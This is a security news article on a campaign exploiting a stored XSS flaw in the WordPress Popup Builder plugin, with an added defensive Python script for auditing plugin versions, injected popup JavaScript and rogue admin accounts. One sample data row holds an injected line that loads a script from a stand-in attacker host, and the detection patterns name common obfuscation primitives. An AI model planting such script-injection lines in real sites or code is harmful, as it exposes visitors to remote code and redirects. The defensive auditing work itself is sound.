New Malware Campaign Exploits Popup Builder Plugin Vulnerability in WordPress

A recent malware campaign has been identified that exploits a critical security flaw in the Popup Builder plugin for WordPress. According to the report, the campaign has compromised over 3,900 websites in the past three weeks. The researchers noted that the attacks are linked to domains registered less than a month ago, the earliest on February 12th, 2024.

The campaign targets CVE-2023-6000, a stored cross-site scripting (XSS) vulnerability in Popup Builder that was fixed in version 4.2.3. Script injected through the flaw executes in the browser of anyone who views the affected content, including logged-in administrators, which is how it has been used to create unauthorized admin users and install malicious plugins. The same vulnerability was exploited earlier in the Balada Injector campaign, which affected over 7,000 sites.

The current attacks inject malicious JavaScript into the affected sites; when a page loads, the script redirects visitors to phishing and scam pages. WordPress site owners are advised to update Popup Builder to 4.2.3 or later (and keep all other plugins current), audit their sites for injected code, unexpected administrator accounts and unknown plugins, and remove anything they did not install themselves. Because the attacker infrastructure consists of newly registered domains, external script sources that the site does not normally load are a useful starting point for the audit.
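The audit described above, as an added example that is not code from the report or from the Popup Builder project: it checks an installed plugin version against the 4.2.3 fix, scans stored popup settings for external script hosts outside a site-specific allowlist (and for common obfuscation primitives such as eval/atob), and lists administrator accounts created on or after the campaign's earliest domain registration date. The `meta_key` name, the allowlist, the domains and all sample rows are constructed for illustration, not indicators from the report; in a real engagement the rows would come from `wp_postmeta` and `wp_users`/`wp_usermeta`.

```python
"""Offline triage helpers for the Popup Builder injection campaign.

Added example, not Sucuri's or the plugin's code. All sample data below is
constructed; meta_key names, domains and user rows are assumptions.
"""
import re

# Popup Builder releases before 4.2.3 are affected by CVE-2023-6000.
PATCHED_VERSION = (4, 2, 3)

# Hosts this (hypothetical) site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"example.com", "cdn.example.com"}

# External script sources: <script src="..."> tags or `x.src = '...'` in JS.
SCRIPT_SRC = re.compile(
    r"(?:<script[^>]*\bsrc\s*=|\.src\s*=)\s*['\"]?(?:https?:)?//([^/'\"\s>]+)",
    re.I,
)
# Primitives commonly used to hide a second-stage loader in injected JS.
SUSPICIOUS_INLINE = re.compile(
    r"(?:document\.createElement\s*\(\s*['\"]script['\"]\s*\)|eval\s*\(|atob\s*\(|"
    r"String\.fromCharCode|unescape\s*\()",
    re.I,
)

# Constructed sample rows: (post_id, meta_key, meta_value). The key name is a
# placeholder for wherever the plugin stores its "Custom JS" setting.
SAMPLE_POSTMETA = [
    (101, "sg_popup_custom_js", "jQuery(function(){ jQuery('.sgpb-popup').fadeIn(); });"),
    (102, "sg_popup_custom_js", '<script src="https://cdn.example.com/popup-helper.js"></script>'),
    (103, "sg_popup_custom_js",
     "var s=document.createElement('script');s.src='https://evil-redirect.invalid/x.js';"
     "document.head.appendChild(s);"),
]
# Constructed sample users: (user_login, role, user_registered).
SAMPLE_USERS = [
    ("admin", "administrator", "2021-05-01 10:00:00"),
    ("editor_jane", "editor", "2024-02-20 09:12:00"),
    ("wp_support_42", "administrator", "2024-02-27 03:14:00"),
]


def parse_version(version):
    """'4.2' -> (4, 2, 0); '4.2.10' -> (4, 2, 10). Tuples compare numerically."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    return parts + (0,) * (3 - len(parts))


def plugin_is_vulnerable(version):
    """True if the installed Popup Builder version predates the 4.2.3 fix."""
    return parse_version(version) < PATCHED_VERSION


def suspicious_script_hosts(js):
    """External script hosts referenced by a snippet that are not allowlisted."""
    hosts = {h.lower() for h in SCRIPT_SRC.findall(js)}
    return sorted(hosts - ALLOWED_SCRIPT_HOSTS)


def scan_postmeta(rows):
    """Flag stored popup settings that load scripts from unknown hosts or use
    obfuscation primitives. Returns one finding dict per suspicious row."""
    findings = []
    for post_id, meta_key, value in rows:
        if not value:
            continue
        hosts = suspicious_script_hosts(value)
        obfuscated = bool(SUSPICIOUS_INLINE.search(value))
        if hosts or obfuscated:
            findings.append({"post_id": post_id, "meta_key": meta_key,
                             "hosts": hosts, "obfuscation": obfuscated})
    return findings


def rogue_admins(users, since):
    """Administrator accounts registered on or after `since` ('YYYY-MM-DD').
    Dates are ISO-formatted, so a plain string comparison orders them."""
    return [login for login, role, registered in users
            if role == "administrator" and registered[:10] >= since]


if __name__ == "__main__":
    print("Popup Builder 4.2.2 vulnerable:", plugin_is_vulnerable("4.2.2"))
    for f in scan_postmeta(SAMPLE_POSTMETA):
        print("injected JS in post", f["post_id"], f["meta_key"], f["hosts"], f["obfuscation"])
    print("admins created since 2024-02-12:", rogue_admins(SAMPLE_USERS, "2024-02-12"))
```

The allowlist approach is deliberate: a blocklist of the campaign's current domains goes stale as soon as the operators register new ones, whereas a site rarely changes the set of third-party hosts it legitimately loads scripts from. Any hit in `scan_postmeta` should be removed together with the account or plugin the script may already have planted, not just the script itself.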

The researchers emphasized the importance of keeping website software patched and up to date; a fix for CVE-2023-6000 has been available since late 2023, so every site compromised in this campaign was running a plugin version that had already been superseded.

Separately, a high-severity bug was disclosed in the Ultimate Member plugin for WordPress. This cross-site scripting (XSS) flaw, tracked as CVE-2024-2123, allows unauthenticated attackers to inject arbitrary web scripts into vulnerable pages. It has been patched in version 2.8.4, released on March 6, 2024.

WordPress site owners should treat plugin advisories like these as time-sensitive and apply patches promptly, since both campaigns described here targeted flaws for which fixes already existed.

To reduce exposure to malware delivered through WordPress plugins: keep all plugins and themes updated to their latest versions; remove unused plugins and themes, since inactive code still ships with the site and widens the attack surface; use a reputable security plugin and monitor the site for unexpected administrator accounts, new plugins and injected scripts; and back up the site regularly, keeping copies off the web server, so that a compromise can be recovered from a known-good state.